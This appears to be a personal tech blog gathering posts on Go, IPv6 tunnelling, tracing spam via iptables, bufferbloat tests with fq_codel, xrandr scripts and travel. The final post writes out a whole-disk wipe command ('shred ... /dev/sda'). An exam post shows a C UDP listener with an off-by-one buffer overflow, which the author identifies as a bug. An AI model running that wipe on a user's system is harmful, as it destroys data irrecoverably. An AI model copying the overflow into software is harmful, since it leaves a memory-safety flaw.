How do you find bugs like this? – Not without an example message that makes Bogofilter crash reproducibly. In this case it was real mail with a big PDF file attachment sent via my university's mail server. Because Bogofilter would repeatedly crash trying to parse the message, at some point a Nagios check alerted us that one mail in the queue was delayed for more than an hour. So we made a copy of it to examine the bug more closely. A little Valgrinding later, and you know where to start your search for the out-of-bounds write.
I’ve been experimenting with the Go Programming Language for the past few days. (Thanks to Jürgen, who held two introduction sessions at work.) I have not dived very deeply into the language, but already I feel it suits me pretty well.
Go is a really clean and simple, yet powerful language. Here’s what I like so far:
Go is statically typed – I believe this catches a lot of the obvious coding errors you make in your day-to-day scripting language.
Variables are declared with :=. As a mathematician, I like this
very much, and it’ll give you errors if you re-declare the same
variable twice.
C without the cruft and overhead – There are real string types.
You can concatenate them on the fly. Most objects can be
stringified. For example, printing a struct with
fmt.Printf("s = %#v", s) will print the struct in key: value
format, in turn stringifying the elements. This makes for easy
debugging.
Slices (somewhat like arrays, but really much more useful) can be
grown dynamically: sl = append(sl, args...) – no more checking and
perhaps re-allocating space for new objects. No more for-loops over
every element: Simply range over it.
You are allowed, even encouraged, to return to the caller variables
that were initialized on the stack. No more return xstrdup(errmsg);.
Oh, and of course: Garbage Collection.
Clean syntax and a strict compiler – Often I have to wade through really bad C code, cursing about mixed tabs, spaces, indentations. Compilation is only possible with tons of warnings.
Not so with Go. The language is a lot like C, but the compiler is strict: You include an unnecessary package? Compilation error. You have an unused variable? Compilation error. You make a computation without assigning (storing) the return value? Compilation error.
What about tabs vs. spaces? Spaces around + signs? Before
parentheses? Alignment of struct fields? – There’s a definite
answer, and
it's called gofmt.
To re-format all Go files, simply use gofmt -w .. I have installed
a simple Git hook to alert me whenever I’m about to commit code
not in accordance with the style guide:
#!/bin/sh
validgo() {
d="$(git show :"$1" | gofmt -d)"
[ -z "$d" ] && return 0
echo "$d"
echo
echo "File $1 contains improper Go syntax;"
echo "please fix with 'gofmt -w $1' before committing!"
return 1
}
git diff --cached --check || exit 1
git diff-index --name-only --diff-filter=ACM HEAD | while read f; do
if [ "${f##*.}" = "go" ]; then
validgo "$f" || exit 1 # exit in subshell!
fi
done || exit 1 # make the hook fail
Easy-to-use concurrency handling – If you’ve ever tried to write a simple multithreaded C application with multiple workers and a master aggregating the workers’ results, you’ll find that’s really painful. In Go, it feels really natural.
You start off goroutines (‘lightweight threads’) with the go
keyword, which is almost like the binary & pattern in your
average shell: The goroutine is dispatched, and the caller proceeds
without waiting for it to return.
These routines (or any other parts of your program, for that matter) should communicate solely using channels. (Read more about them here.) They are a lot like UNIX sockets: You can put stuff in them, and it comes out at the other end; they have a certain buffer size: writing blocks if that’s full, reading if it’s empty; you can close them.
You don’t have to use channels to send data; you can also use them
to synchronize events. For exaple, if you dispatch a goroutine,
you’re unable to tell when it has finished. But if you want to wait
for it to finish, you could use a channel with a buffer size of 0
(i.e. reading from it will block until someone is writing to it).
Call this channel done and pass it to the goroutine (for example
as a paramater). From the caller’s perspective, you just wait for
something in that channel: <-done. Once the goroutine is finished,
it’ll write some arbitrary data to that channel. If the channel is
of type chan bool, then done <- true will make the caller
unblock, receive the value und continue with code execution.
One thing I didn’t get at first was the close/range idiom: If
there’s a finite amount of data that you want to sequentially read
and handle, stopping when there’s no more data left, you can use
this idiom: A function that returns a channel where a goroutine will
write results, eventually closing the channel and thus signalling the
range operator that this was the last result.
func compute(...) (chan T) {
c := make(chan T)
go func() {
defer close(c)
...
}()
return c
}
c := compute(...)
for res := range c {
// do something with res
}
Nice and intuitive code flow – Apart from spawning goroutines
easily, there are some really simple things that make life easier.
Namely, defer statements and multiple return values.
You can declare functions to be called when the function returns
(like closing channel c in the above example). This eliminates the
usual C pattern where you have a label finish with lots of
if(fd != -1) close(fd); cases. In Go, you rather write:
f, err := os.Open(fn)
defer f.Close()
No matter where you actually throw in your return, you are
guaranteed to have the file closed properly after the function has
returned.
Also, you can return multiple values. But you don’t have to
explicitly list them to return them. If you name them during
function declaration: func fn(...) (a, b, c int) { ... } – then
just say return to return the current values of a, b und c.
I have not really fully grasped the importance of interfaces, but I guess I’ll come to that in a few days.
So far, there’s one thing I don’t like: The error checking idiom
result, err := function(...)
if err != nil {
// handle error
}
It’s not the multi-value return… I find that much better than the
usual try-catch-blocks. (Quote Rob Pike: “errors are not
exceptional!”) It’s just that I’d like to check for an error, not if
the error is not nothing. From a logician’s point of view it’s the
same. But I believe if you could somehow write if err { ... } the
code would be so much more readable. Why can’t nil be cast to the
Bool type false?
–
Go is really easy to start with. It took me all of one hour to do a simple client-server-application than can pass a Go struct using net/rpc.
But I am not really sure yet how well Go scales. That is, how much
parallelisation is actually good. I did a little coding exercise: On
my system, grep is CPU-bound when the relevant files are in the disk
cache. So I thought, maybe I can simply create a multithreaded grep in
Go.
I have a simple version (simple as
in: it emulates fgrep -IR) that uses one goroutine for every file.
The workers themselves are sent over a channel (a “channel of
channels”) so that the order of output files resembles the order of
files checked.
However, my grep is an order of magnitude slower than the real grep. I tried using the profiler, but I haven’t gotten any meaningful results out of it. If you have a clue to that problem, please write me an e-mail!
Today I finally had time to update my Résumé. So I imported an old version in a new Git repo and set out to do it right once and for all:
I settled for moderncv
(see the ‘examples’ subdirectory for some nice examples). It’ll
automatically create the headers, align all the CV items — and does a
pretty good job at providing a simple yet good-looking and versatile
\cventry command.
I’m now keeping a single cv.tex file that will get processed
differently according to which file I want to compile. The Makefile
looks like this:
DEFAULT: cv-en.pdf cv-de.pdf
cv-en.pdf: cv.tex
pdflatex -jobname cv-en cv
cv-de.pdf: cv.tex
pdflatex -jobname cv-de cv
The -jobname argument will influence where the output file will be
saved. Also, it is available from within the LaTeX document as such:
\usepackage{etoolbox}
\usepackage{ifthen}
\newtoggle{de}
\newcommand{\de}[2]{\iftoggle{de}{#1}{#2}}
\ifthenelse{\equal{\detokenize{cv-de}}{\jobname}}{
\toggletrue{de}
}{
\togglefalse{de}
}
So if the job name is cv-de, then the de toggle will be true. With
the little \de helper function, I can now use something like
\title{\de{Lebenslauf}{Résumé}}
or
\cvlistdoubleitem{
\de{Deutsch (Muttersprache)}
{German (native speaker)}
}{
\de{Englisch (fließend)}
{English (fluent)}
}
throughout the document. A simple distrib rule that contains a
scp command to upload the PDFs to a website, and I’m done for today.
Oh, by the way: If you know a company in the Dubai or Abu Dhabi region that might be interested in giving me a two-month internship opportunity — please contact me! CV available on request ;-)
Sooo... I'm finally part of the IPv6 world now, and so is this blog. I've been meaning to do this for a long time now, but ... you know. – I ran into some traps – partly my own fault – so I might just share it for others, too.
First of all, and this got me several times, when testing loosen up
your iptables settings. That especially means setting the right
policies in ip6tables: ip6tables -P INPUT ACCEPT. (I had set the
default policy to DROP before automatically at interface-up time.
It's better safe than sorry. Do you know what services listen on ::
by default?)
I started out using a simple
Teredo tunnel, which
worked well enough. See Bart's article
ipv6 on your desktop in 2
steps. The default
gai.conf, used by the glibc to resolve hosts, will still prefer IPv4
addresses over IPv6 if your only access is a Teredo tunnel. You can
change this by commenting out the default label policies in
/etc/gai.conf, except for the #label 2001:0::/32 7 line. (See
here
for example. The blog post advises to reboot or wait 15 minutes, but
for me it was enough to re-start my browser / newsreader / ...)
So I set up IPv6 on my server. This was rather easy because Hetzner provides native v6. The real work is just re-creating the iptables rules, adding new AAAA records for DNS. Strike that: The real work is teaching all your small tools to accept IPv6-formatted addresses. (Great efforts are underway to modernize many programs. But especially your odd Perl script will simply choke on the new log files. :-P)
I am still not sure how I should use all these addresses. For now I
enabled one "main" IP for the server, 2a01:4f8:150:4022::2. Then I
have one for plenz.com and one for the blog,
ending in leet-speak "blog": 2a01:4f8:150:4022::b109 – Is it
useful to enable one ip for every subdomain and service? It sure seems
nice, but also a big administrative burden...
Living with the Teredo tunnel for some hours, I wanted to do it "the right way", i.e. enabling IPv6 tunneling on my router. Over at HE's Tunnelbroker you'll get your free tunnel, suitable for connecting your home network.
I'm still using an old OpenWRT WhiteRussian setup with 2.4 kernel, but everything works surprisingly well, once I figured out how to do it properly. HE conveniently provides commands to set up the tunnel; however, setting up the tunnel creates a default route that routes packets destined to your prefix across the tunnel. (I don't know why this is the case.) Thus, after establishing the tunnel, I'm doing:
# send traffic destined to my prefix via the LAN bridge br0
ip route del <prefix>::/64 dev he-ipv6
ip route add <prefix>::/64 dev br0
Second, I want to automatically update my IPv6 tunnel endpoint
address. HE conveniently provides and IPv4 interface for that. Simply
md5-hash your password via echo -n PASS | md5sum, find out your user
name hash from the login start page (apparently not the md5 hash of
your username :-P) and your tunnel ID. My script looks like this:
root@ndogo:~# cat /etc/ppp/ip-up.d/he-tunnel
#!/bin/sh
set -x
my_ip="$(ip addr show dev ppp0 | grep ' inet ' | awk '{print $2}')"
wget -O /dev/null "http://ipv4.tunnelbroker.net/ipv4_end.php?ipv4b=$my_ip&pass=PWHASH&user_id=UHASH&tunnel_id=TID"
ip tunnel del he-ipv6
ip tunnel add he-ipv6 mode sit remote 216.66.86.114 local $my_ip ttl 255
# watch the MTU!
ip link set dev he-ipv6 mtu 1280
ip link set he-ipv6 up
ip addr add <prefix>::2/64 dev he-ipv6
ip route add ::/0 dev he-ipv6 mtu 1280
# fix up the routes
ip route del <prefix>::/64 dev he-ipv6
ip route add <prefix>::/64 dev br0 2>/dev/null
Side note: Don't think that scripts under /etc/ppp/ip-up.d would get
executed automaically when the interface comes up. Use something like
this instead:
root@ndogo:~# cat /etc/hotplug.d/iface/20-ipv6
#!/bin/sh
[ "${ACTION:-ifup}" = "ifup" ] && /etc/ppp/ip-up.d/he-tunnel
The connection seemed to work nicely at first. At least, all Google
searches were using IPv6 and were fast at that. However, oftentimes (in
about 80% of cases) establishing a connection via IPv6 was not
working. Pings (and thus traceroutes) showed no network outage or
other delays along the way. However, tcpdump showed wrong checksums
for a lot of TCP packets.
Only today I got an idea why this might be: wrong MTU. So I set the
MTU to 1280 in the HE web interface and on the router, too: ip link
set dev he-ipv6 mtu 1280. Suddenly, all connections work perfectly.
I've been toying around with the privacy extensions, too, but I don't know how to enable the mode "one IP per new service provider". There's some information about the PEs here but for now I have disabled them.
My flatmate's Windows computer and iPhone picked up IPv6 without further configuration.
I'm actually astonished how many web sites are IPv6 ready. So far I like what I'm seeing.
Update: While setting up an AAAA record for the blog, I forgot it had been a wildcard CNAME previously. The blog was not reachable via IPv4 for a day – that was not intended! ;-)
A week ago our server was listed as sending out spam by the CBL, which is part of the XBL which in turn is part of the widely-used Spamhaus ZEN block list. As a practical result, we couldn't send out mail to GMX or Hotmail any more:
<someone@gmx.de>: host mx0.gmx.net[213.165.64.100] said:
550-5.7.1 {mx048} The IP address of the server you are using to connect to GMX is listed in
550-5.7.1 the XBL Blocking List (CBL + NJABL). 550-5.7.1 For additional information, please visit
550-5.7.1 http://www.spamhaus.org/query/bl?ip=176.9.34.52 and
550 5.7.1 ( http://portal.gmx.net/serverrules ) (in reply to RCPT TO command)
The first source we identified was a postfix alias forwarding to a virtual alias domain; however, I had deleted the user in the latter table, such that postfix would return a "user unknown in virtual alias table" error to the sender. But because the sender was localhost, postfix would create a bounce mail. (This is known as Backscatter.)
But one day later, our IP was listed in CBL again. So I started digging deeper. How do you identify who is sending out spam? There are some obvious points to start:
To get a clearer image of what was really happening, I did two things. First, I implemented a very simple "who is doing SMTP" log mechanism using iptables. It went like this:
$ cut -d: -f1 /etc/passwd | while read user; do
echo iptables -A POSTROUTING -p tcp --dport 25 -m owner --uid-owner $user -j LOG --log-prefix \"$user tried SMTP: \" --log-level 6;
done
iptables -A POSTROUTING -p tcp --dport 25 -m owner --uid-owner root -j LOG --log-prefix "root tried SMTP: " --log-level 6
iptables -A POSTROUTING -p tcp --dport 25 -m owner --uid-owner feh -j LOG --log-prefix "feh tried SMTP: " --log-level 6
...
(To be honest I used a Vim macro to make the list of rules, but that's hard to write down in a blog post.)
Second, I NAT'ed all users except for postfix to a different IP address:
$ iptables -A POSTROUTING -p tcp --dport 25 -m owner ! --uid-owner
postfix -j SNAT --to-source 176.9.247.94
Then, I dumped the SMTP-related TCP flows for that IP address:
$ tcpflow -c 'host 176.9.247.94 and (dst port 25 or src port 25)'
I waited for a short time, and soon another wave of spam was sent out. Now I could clearly identify the user:
Jul 19 16:48:35 noam kernel: [5590933.619960] pete tried SMTP: IN= OUT=eth0 SRC=176.9.34.52 DST=65.55.92.184 ...
Jul 19 16:48:38 noam kernel: [5590936.616860] pete tried SMTP: IN= OUT=eth0 SRC=176.9.34.52 DST=65.55.92.184 ...
Jul 19 16:48:44 noam kernel: [5590942.615608] pete tried SMTP: IN= OUT=eth0 SRC=176.9.34.52 DST=65.55.92.184 ...
But instead of finding an infected web app, I found that the user was
logged in via SSH and was executing sleep 3600 commands. When I
killed the SSH session, the spamming stopped immediately.
Since this was not a user I know personally, I don't know what happened. My best guess is an infected Windows computer and an SSH SOCKS forwarding setup that allowed the (romanian) spammer to tunnel its connections.
One question remains: Are modern spam-drones able to steal WinSCP/PuTTY login credentials from the Registry and use them to silently set up SSH tunnels? Or was this just a case of bad luck?
I'm currently working on a computer science project where we try to understand and possibly research solutions to the bufferbloat phenomenon. We created some simple RRD graphing automatism to better visualize the phenomenon.
In short – and most internet users would say this is perfectly normal behaviour – Bufferbloat describes that with high-speed uploads or downloads, network latency skyrockets. For my home router and a five-megabyte upload, it looks like this:

The grid intervals are in seconds and feature 10 data points corresponding to 10 pings in that second to a server (here 8.8.8.8). Lighter blue means further away from the median, which for clarity is displayed as a black line, too. – Thus you can see that the nearly constant ping time of ~20ms goes up to an unsteady ~140ms during the upload.
In the next-20120524 Kernel tree the codel and fq_codel queuing
disciplines were made available.
The CoDel implementation is based on this month's paper by van
Jacobsen at al, which is
definitely worth a read (and features good explanatory diagrams, too).
So I set out to try fq_codel locally first, that is: limiting my
Wifi output rate to the supposed output rate of my cable modem and then
re-do the same upload.
With tc-commands, this resolves to this:
IF=wlan0
tc qdisc del dev $IF root
tc qdisc add dev $IF root handle 1: htb
tc class add dev $IF parent 1: classid 1:1 htb rate 125kbps
tc qdisc add dev $IF parent 1:1 handle 10: fq_codel
tc filter add dev $IF protocol ip prio 1 u32 match ip dst 0.0.0.0/0 flowid 1:1
And guess what happens? The upload that took 45.7 seconds before now takes 46.9 seconds; but the median ping times are around 30ms as opposed to ~140ms. (Also, consider that the packet loss is down to 0% as opposed to 1.5% before.) So this is really nice:

I hope I can test this with my colleagues using a fresh CeroWRT install next week such that we can control all the parameters and do more accurate measurements.
Update: The default 13 parameter to the root handle HTB qdisc
that was present in the original version of this post is unnecessary
and was thus removed.
I have a pair of new monitors (Dell U2312HM, find them here). I used to have one somewhat cheap 18.5" widescreen with 1366x768 (which is the same resolution as my Thinkpad X220), but reading long texts or working long hours really tired my eyes a lot.
The new screens have nice 23" IPS panels with great viewing angles. But most important of all, I can adjust the height of the screens and rotate them. Now my desk looks like this:
The X220 can only have two monitors connected at once. Also, the Docking Station's DVI output is single link. Thus, I connect one of the monitors via VGA and the other via DVI.
I use a simple shell script that is invoked when I press Fn+F7. Note that you have to turn off the LVDS1 internal display first before you can activate the two screens at once.
if [ $(xrandr -q | grep -c " 1920x1080 60.0 +") -eq 2 ]; then
xrandr --output LVDS1 --off
xrandr --output HDMI3 --auto --rotate left --output VGA1 --auto --right-of HDMI3 --primary
else
xrandr --output VGA1 --off --output HDMI3 --off
xrandr --output LVDS1 --auto
fi
I'm back from Sudan! – After six weeks of travelling in the desert, mostly taking cheap sleeping options and uncomfortable local transport it is a huge relief to have these certain luxury items again: Water from the tap (which you can drink!), a hot shower, a washing machine and a nice bed.
I wrote a travel diary and will use excerpts to write up a travelog with some photos from the journey. (This will take some days, naturally.) Already I tried stitching together a panorama image of Marawi, taken in the first morning light from the top of Jebel Barkal near Karima. It's a very typical pattern which you can see anywhere along the Nile: a few hundred meters of fields, then the main village, a tarmac road – built by the Chinese, mostly – and then: hundreds of kilometers of desert.
It is shivery-cold here in Berlin; already I miss Khartoum's every-day-above-40°C weather.
I'm so excited! Tomorrow afternoon, together with a good friend of mine I'll board a plane to Cairo, Egypt. There, we'll try to acquire visas to enter Sudan. Essentially, we will travel up the river Nile from Cairo via Aswan, Wadi Halfa, and Atbara to Khartoum. If we have time, we'll also visit Port Sudan. In total, we have six weeks of time on our hands.
I hope I'm prepared well: I've been learning a bit of Arabic at university for the past two semesters; also, I've been reading the Sudan Tribune the past few months to stay up to date about the situation there. – Other than that, it's the usual stuff you should bring: insect repellent, anti-malaria tablets, water purifier, sunblocker, a good book and a (paper) notebook. Oh, and they don't have ATMs in Sudan, so it's all cash. Better hide it well. (Correction: There are no ATMs for international CCs like Master, Visa oder AmEx. For the local banks, there are quite a few.)
I had to cut down on my initial travel plans, which would have led from Cairo to Dar es Salaam (via Khartoum, Juba, Kampala), crossing five countries in total. This is not feasible any more, however, due to the high tension and violence in Southern Sudan (especially in the Abyei region). – On the upside, it'll be a rather relaxed journey now!
In Khartoum it's 36°C right now... – See you in April!
Al Jazeera's documentary about the Bahrain protests, Shouting in the Dark, has received a prestigeous award. The documentary is really worth watching.
I found the insidious practices of the Bahraini prince – and the Arab league's suport – extremely unnerving.
I just wrote an exam for the course Technische Informatik III which was about operating systems and network communication. In the exercises throughout the semster, we had to program in C a lot. Naturally, in the exam was one task about interpreting what a C program does.
It was really simple: Listening on a UDP socket and print incoming packets
along with source address and port. The program looked somewhat like this (from
what I remember; also some things were done in a not so clever way on the exercise
sheet, and they had obfuscated the variable names to a non-descriptive
a, b, etc.):
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <error.h>
int main(int argc, char *argv[])
{
int sockfd;
struct sockaddr_in listen, incoming;
socklen_t incoming_len;
char buf[1024];
int len; /* of received data */
/* listen on 0.0.0.0:5000 */
listen.sin_family = AF_INET;
listen.sin_addr.s_addr = INADDR_ANY;
listen.sin_port = htons(5000);
if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1)
perror("socket");
if(bind(sockfd, (struct sockaddr *) &listen, sizeof(listen)) == -1)
perror("bind");
while(1) {
len = recvfrom(sockfd, buf, 1024, 0, (struct sockaddr *) &incoming,
&incoming_len);
buf[len] = '\0';
printf("from %s:%d: \"%s\"\n", inet_ntoa(incoming.sin_addr),
ntohs(incoming.sin_port), buf);
}
}
I lol'd so hard when I saw this. It's a classic off-by-one error. (Can you spot it, too?)
If you want to store x bytes of data in a string, reserve x+1
bytes for the NULL termination character. Here, if you send a message
that is exactly 1024 bytes long (or longer, as it'll get truncated),
buf[len] will actually be the 1025th byte. Which might
just be anything.
And those guys want to teach network and filesystem programming – hilarious. :-D
Last weekend I toyed around a bit and tried to write a shared object
library that can be used via LD_PRELOAD to minimize the effect a
program has on the Linux filesystem
cache.
Basically the use case is that you have a productive system running, and you don't want your backup script to fill the filesystem cache with mostly useless information at night (files that were cached should stay cached). I didn't test whether this brings measurable improvements yet.
The coding was really fun and provided me with yet another insight how the simple concept of file descriptors in UNIX is just great. (GNU software is tough, though: I got stuck once, and found help on Stackoverflow, which I had never used before.)
I'm currently shredding my old X41's hard drive, because I want to sell it (if you are interested, contact me). I'm overwriting it with zeros, ten passes:
$ shred -vfz -n 10 /dev/sda
Luckily, the disk was fully encrypted all the time. So it's just a precaution.